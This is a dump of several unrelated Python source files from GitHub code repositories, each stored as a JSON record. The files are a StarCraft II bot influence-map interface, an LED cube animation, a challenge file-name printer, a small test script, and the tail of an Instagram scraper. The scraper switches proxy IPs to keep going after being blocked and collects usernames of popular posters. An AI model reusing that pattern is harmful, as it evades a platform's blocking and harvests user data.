traceback.print_exc())\n print('切换新的ip,休眠{0}秒后执行....'.format(sleep_second))\n # 切换可用的新IP\n cutover_proxy()\n time.sleep(sleep_second)\n return dict({})\n\n\ndef resolve_section_data(sections):\n blog_url_list = []\n for section in sections:\n layout_content = section.get('layout_content')\n medias = layout_content.get('medias')\n for media in medias:\n media_data = media.get('media')\n try:\n comment_count = int(media_data.get('comment_count', 0))\n like_count = int(media_data.get('like_count', 0))\n except TypeError:\n print('typeError exception:', traceback.print_exc())\n\n if comment_count + like_count >= 300:\n user = media_data.get('user')\n username = user.get('username')\n blog_url_list.append('https://www.instagram.com/' + username)\n\n return blog_url_list\n\n\nif __name__ == '__main__':\n tag = 'smok'\n tag_result = access_tag_page(tag)\n print(tag_result)\n","repo_name":"shopastro/shopastro-python","sub_path":"instagram/packs/ins_tags_data.py","file_name":"ins_tags_data.py","file_ext":"py","file_size_in_byte":9316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71390698987","text":"# Imports:\n\n# StarCraft II:\n# > Bot AI:\nfrom sc2.bot_ai import BotAI\n\n# > Position:\nfrom sc2.position import Point3\n\n# MapAnalyzer:\n# > MapData:\nfrom sc2city.MapAnalyzer.MapData import MapData\n\n# Typing:\nimport typing\n\n# Numpy:\nimport numpy\n\n# Classes:\n\n\"\"\"\n* Interface class to allow SC2City to access the MapAnalyzer API.\n*\n* @param AI --> The SC2City AI object.\n*\n* @param debug --> A setting to enable debugging features for functions.\n*\n\"\"\"\n\n\nclass MapAnalyzerInterface:\n # Constants:\n EXTRA_GROUND_DISTANCE: int = 3\n EXTRA_AIR_DISTANCE: int = 3\n\n # Initialization:\n def __init__(self, AI: BotAI = None, debug: bool = False) -> None:\n # Miscellaneous:\n self.AI: BotAI = AI\n\n # Objects:\n self.MapData: MapData = MapData(bot=AI, loglevel=\"INFO\")\n\n # Booleans:\n self.debug: bool = debug\n\n # Grids:\n self.enemy_ground_to_air_grid: typing.Optional[numpy.ndarray] = None\n self.enemy_ground_grid: typing.Optional[numpy.ndarray] = None\n self.enemy_air_grid: typing.Optional[numpy.ndarray] = None\n\n self.reaper_grid: typing.Optional[numpy.ndarray] = None\n\n # Methods:\n\n \"\"\"\n * A method to construct influential maps indicating the enemy's influence.\n *\n \"\"\"\n\n def create_influence_maps(self) -> None:\n # Constructing Grids:\n self.enemy_ground_to_air_grid: numpy.ndarray = self.MapData.get_clean_air_grid(\n default_weight=1\n )\n self.enemy_ground_grid: numpy.ndarray = self.MapData.get_pyastar_grid(\n default_weight=1\n )\n self.enemy_air_grid: numpy.ndarray = self.MapData.get_pyastar_grid(\n default_weight=1\n )\n\n self.reaper_grid: numpy.ndarray = self.MapData.get_climber_grid(\n default_weight=1\n )\n\n for enemy_unit in self.AI.MemoryManager.enemy_unit_tag_to_unit_object.values():\n # Debugging:\n if self.debug:\n self.AI.client.debug_sphere_out(\n p=enemy_unit, r=enemy_unit.radius, color=(255, 0, 0)\n )\n\n if enemy_unit.can_attack_ground:\n enemy_total_range: float = (\n enemy_unit.radius\n + enemy_unit.ground_range\n + self.EXTRA_GROUND_DISTANCE\n )\n\n (\n self.enemy_ground_grid,\n self.reaper_grid,\n ) = self.MapData.add_cost_to_multiple_grids(\n position=enemy_unit.position,\n radius=enemy_total_range,\n grids=[self.enemy_ground_grid, self.reaper_grid],\n weight=enemy_unit.ground_dps,\n )\n elif enemy_unit.can_attack_air:\n enemy_total_range: float = (\n enemy_unit.radius + enemy_unit.air_range + self.EXTRA_AIR_DISTANCE\n )\n\n if enemy_unit.is_flying:\n self.enemy_air_grid = self.MapData.add_cost(\n position=enemy_unit.position,\n radius=enemy_total_range,\n grid=self.enemy_air_grid,\n weight=enemy_unit.air_dps,\n )\n else:\n (\n self.enemy_ground_to_air_grid,\n self.enemy_air_grid,\n ) = self.MapData.add_cost_to_multiple_grids(\n position=enemy_unit.position,\n radius=enemy_total_range,\n grids=[self.enemy_ground_to_air_grid, self.enemy_air_grid],\n weight=enemy_unit.air_dps,\n )\n\n if self.debug:\n # Variables:\n color: Point3 = Point3((201, 168, 79))\n size: int = 14\n\n for x, y in zip(*numpy.where(self.enemy_ground_grid > 1)):\n height: float = self.AI.get_terrain_z_height(\n self.AI.start_location\n )\n\n position: Point3 = Point3((x, y, height))\n\n if self.enemy_ground_grid[x, y] == numpy.inf:\n continue\n\n value: int = int(self.enemy_ground_grid[x, y])\n self.AI.client.debug_text_world(\n text=str(value), pos=position, color=color, size=size\n )\n","repo_name":"savelas81/Sc2City","sub_path":"sc2city/interfaces/MA_interface.py","file_name":"MA_interface.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33816588000","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport locators\n\ndef main():\n verifyCatalogSwitch()\n print(getattr(globals()['locators'],'leftBar_catalog_switch'))\n\n\ndef verifyCatalogSwitch():\n print(locators.leftBar_catalog_switch)\n print(locators.leftBar_tool_freeze)\n\nif __name__=='__main__':\n #inputfile=r'C:\\ProgramData\\TW\\AcqAltair\\log\\acqaltair_20220712.csv'\n inputfile=r'\\\\10.196.98.73\\Test\\Quality\\Test_Obj_ScanFlow\\Precision\\Precision_Result_Ver1.0.8.302.d145\\Offline_Processing_Speed\\3600\\ScanFlow_20230109.csv'\n main()\n #calcTimeDiff('2021-05-21T15:25:30', '2021-05-21T15:27:21')","repo_name":"flying0dancing/scanflowuiauto","sub_path":"suite_scanflow_auto/shared/scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19115883257","text":"from .cube import *\nimport random\n\ndef fill():\n c = Cube()\n on = True\n while True:\n colour = hue_to_colour(random.randint(0, 359))\n all_positions = [Pos(x, y, z) for x in range(c.size) for y in range(c.size) for z in range(c.size)]\n random.shuffle(all_positions)\n for counter, position in enumerate(all_positions):\n if on:\n c.set(position, colour)\n else:\n c.set(position, Colour.BLACK)\n if counter % c.size == c.size - 1:\n yield c.copy()\n on = not on\n yield True","repo_name":"abryant/LED-Cube","sub_path":"visuals/fill.py","file_name":"fill.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"3789511578","text":"import os, sys\nimport json\n\n# sys.argv[0]=\"3_print_required_file_names_in_the_current_phase.py\"\n# sys.argv[1:]=[\"--split_info_file\", \"./devPhase/challenge_data_split_devPhase.json\"]\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--split_info_file', type=str, help='Path to split file, such as \\{devPhase, chaPhase\\}/challenge_data_split_devPhase_\\{devPhase, chaPhase\\}.json')\n args = parser.parse_args()\n\n with open(args.split_info_file, 'r') as fp:\n sub_id_with_val_test_ids = json.load(fp)\n\n key_to_list = ''\n PhaseName = args.split_info_file.split('/')[-1].split('.')[0].split('_')[-1]\n if(PhaseName == 'devPhase'):\n key_to_list = 'validation'\n print('\\nFor the Developement Phase, please submit a zip file containing the following files:')\n elif(PhaseName == 'chaPhase'):\n key_to_list = 'test'\n print('\\nFor the Challenge Phase, please submit a zip file containing the following files:')\n else:\n print('\\nPlease use *_devPhase.json for the Development Phase or *_chaPhase.json for the Challenge Phase to list the required submission file names.\\n')\n\n if(PhaseName == 'devPhase' or PhaseName == 'chaPhase'):\n type_specified_list = []\n for key_tmp in sub_id_with_val_test_ids.keys():\n for i in range(0, len(sub_id_with_val_test_ids[key_tmp][key_to_list])):\n sub_name = sub_id_with_val_test_ids[key_tmp][key_to_list][i] + '.png'\n print(sub_name)\n print('readme.txt\\n')\n","repo_name":"solanian/view-synthesis-challenge","sub_path":"starting_kit_ILSH/3_print_required_file_names_in_the_current_phase.py","file_name":"3_print_required_file_names_in_the_current_phase.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}